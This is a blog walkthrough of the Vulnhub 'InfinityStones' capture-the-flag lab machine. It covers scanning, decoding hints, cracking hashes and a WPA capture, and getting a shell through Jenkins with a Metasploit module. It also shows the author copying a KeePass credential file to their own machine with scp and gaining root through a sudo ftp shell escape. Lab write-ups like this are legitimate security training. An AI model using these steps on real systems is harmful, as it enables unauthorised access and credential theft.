Vulnhub InfinityStones Walkthrough

We start scanning the host with nmap -A -T4 -p- 192.168.1.20 –vv

Dirb scan results:

Along this pwd.txt file there is a reality.cap that we downloaded, and it looks like it’s a deauthentication file from a wifi router, cracking it with Aircrack-ng but gave me nothing:

Downloading the space image file and viewing the file with exiftool we can see a comment inside the photo

It says space stone and some hash, when cracking the hash online came with the name yashika

The page aether.php is a quiz page solving it as binary gave us this code 01101001 as path to hint file:

Wow I came to this weird looking code, ran it through google and came to be a BrainFuck language and after decoding it gave me login name and password admin:avengers

Now lets head to http://192.168.1.20:8080 to login there

And we got in :

Now if you search for Jenkins on searchsploit you will find an exploit through Metasploit where we can use to gain a shell to the host use exploit/multi/http/jenkins_script_console

Using LinEnum.sh script gave me a file script at /opt and there was another file  morag.kdbx  which I copied it to /html so I can download it to my machine, the file script we already found it before BUT it was inside the image were we decode it and found yashika.

While copying the file to /var/www/html I found a folder named gamA00fe2012 which would be the password to the file reality.cap we found earlier.

And just to be sure I ran it again through Aircrack-ng and yes it’s the password for the file reality.cap

Now back to the morag.kdbx file I copied to my machine using scp -P 22 morag.kdbx root@192.168.1.15:/root/ and looked for .kdbx files so what I did is converted thi file to hash so I can crack the hash in John.

now we got the password we can open the file with the password princesa, by going to a website online https://app.keeweb.info/

I was able to open the file and found a base64 format that we can convert, ( morag:yondu)

So what I did is just write sudo /usr/bin/ftp

ftp:> !/bin/sh

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s